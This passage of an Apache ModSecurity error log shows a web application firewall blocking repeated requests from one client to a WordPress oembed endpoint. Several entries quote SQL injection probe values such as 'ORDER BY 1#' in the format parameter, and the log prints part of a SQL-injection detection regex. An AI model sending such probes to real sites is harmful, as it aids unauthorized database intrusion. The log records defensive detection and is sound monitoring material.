"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27QkPAyXqJhbW53WyPcQAAAFQ"] [Thu Aug 15 03:24:34.713555 2024] [:error] [pid 31336:tid 139653822744320] [client 141.98.81.52:57378] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27QkPAyXqJhbW53WyPcgAAAFU"] [Thu Aug 15 03:24:35.163316 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:57380] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27Q3xeJlWfH1pdny5XwAAAAMw"] [Thu Aug 15 03:24:35.648929 2024] [:error] [pid 31519:tid 139654032893696] [client 141.98.81.52:57382] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml') ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27Q3xeJlWfH1pdny5XwQAAAMQ"] [Thu Aug 15 03:24:36.125728 2024] [:error] [pid 31337:tid 139653831137024] [client 141.98.81.52:57386] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27ROwCyyCVFXh0DMS2vQAAAJQ"] [Thu Aug 15 03:24:36.546249 2024] [:error] [pid 31519:tid 139653822744320] [client 141.98.81.52:57388] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27RHxeJlWfH1pdny5XwwAAANU"] [Thu Aug 15 03:24:36.986094 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:57390] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27RHxeJlWfH1pdny5XxAAAANY"] [Thu Aug 15 03:24:37.432565 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:57396] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27RXxeJlWfH1pdny5XxgAAANQ"] [Thu Aug 15 03:24:37.809569 2024] [:error] [pid 31337:tid 139653889885952] [client 141.98.81.52:57398] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27RewCyyCVFXh0DMS2vgAAAI0"] [Thu Aug 15 03:24:38.222703 2024] [:error] [pid 31337:tid 139653856315136] [client 141.98.81.52:57400] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27RuwCyyCVFXh0DMS2vwAAAJE"] [Thu Aug 15 03:24:38.681426 2024] [:error] [pid 31335:tid 139653847922432] [client 141.98.81.52:57402] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27Rm0MD5oChETZltkVbgAAABI"] [Thu Aug 15 03:24:39.219294 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:57406] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27R3xeJlWfH1pdny5XxwAAAME"] [Thu Aug 15 03:24:39.693290 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:57408] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27R3xeJlWfH1pdny5XyAAAAMM"] [Thu Aug 15 03:24:40.125609 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:57410] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27SHxeJlWfH1pdny5XyQAAANc"] [Thu Aug 15 03:24:40.609151 2024] [:error] [pid 31335:tid 139653915064064] [client 141.98.81.52:57414] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27SG0MD5oChETZltkVcQAAAAo"] [Thu Aug 15 03:24:41.020737 2024] [:error] [pid 31335:tid 139653923456768] [client 141.98.81.52:57416] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27SW0MD5oChETZltkVcgAAAAk"] [Thu Aug 15 03:24:41.362703 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:57418] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27SXxeJlWfH1pdny5XygAAAMo"] [Thu Aug 15 03:24:41.819713 2024] [:error] [pid 31335:tid 139654024500992] [client 141.98.81.52:57420] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27SW0MD5oChETZltkVcwAAAAU"] [Thu Aug 15 03:24:42.270242 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:57422] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27SnxeJlWfH1pdny5XywAAANI"] [Thu Aug 15 03:24:42.717346 2024] [:error] [pid 31337:tid 139653940242176] [client 141.98.81.52:57424] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27SuwCyyCVFXh0DMS2wAAAAIc"] [Thu Aug 15 03:24:43.150743 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:57426] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27S3xeJlWfH1pdny5XzAAAAM4"] [Thu Aug 15 03:24:43.573608 2024] [:error] [pid 31519:tid 139653864707840] [client 141.98.81.52:57428] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27S3xeJlWfH1pdny5XzQAAANA"] [Thu Aug 15 03:24:44.184128 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:57430] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27THxeJlWfH1pdny5XzgAAAMw"] [Thu Aug 15 03:24:44.716583 2024] [:error] [pid 31337:tid 139653797566208] [client 141.98.81.52:57432] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27TOwCyyCVFXh0DMS2wQAAAJg"] [Thu Aug 15 03:24:45.164558 2024] [:error] [pid 31519:tid 139654032893696] [client 141.98.81.52:57434] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27TXxeJlWfH1pdny5XzwAAAMQ"] [Thu Aug 15 03:24:45.562341 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:57436] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml%' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27TXxeJlWfH1pdny5X0AAAAMg"] [Thu Aug 15 03:24:46.183101 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:57438] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27TnxeJlWfH1pdny5X0QAAANg"] [Thu Aug 15 03:24:46.559074 2024] [:error] [pid 31337:tid 139654032893696] [client 141.98.81.52:57440] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27TuwCyyCVFXh0DMS2wgAAAIQ"] [Thu Aug 15 03:24:46.930597 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:57442] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27TnxeJlWfH1pdny5X0gAAAMY"] [Thu Aug 15 03:24:47.427982 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:57444] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27T3xeJlWfH1pdny5X0wAAANQ"] [Thu Aug 15 03:24:47.848760 2024] [:error] [pid 31519:tid 139653873100544] [client 141.98.81.52:57446] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27T3xeJlWfH1pdny5X1AAAAM8"] [Thu Aug 15 03:24:48.265898 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:57448] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data 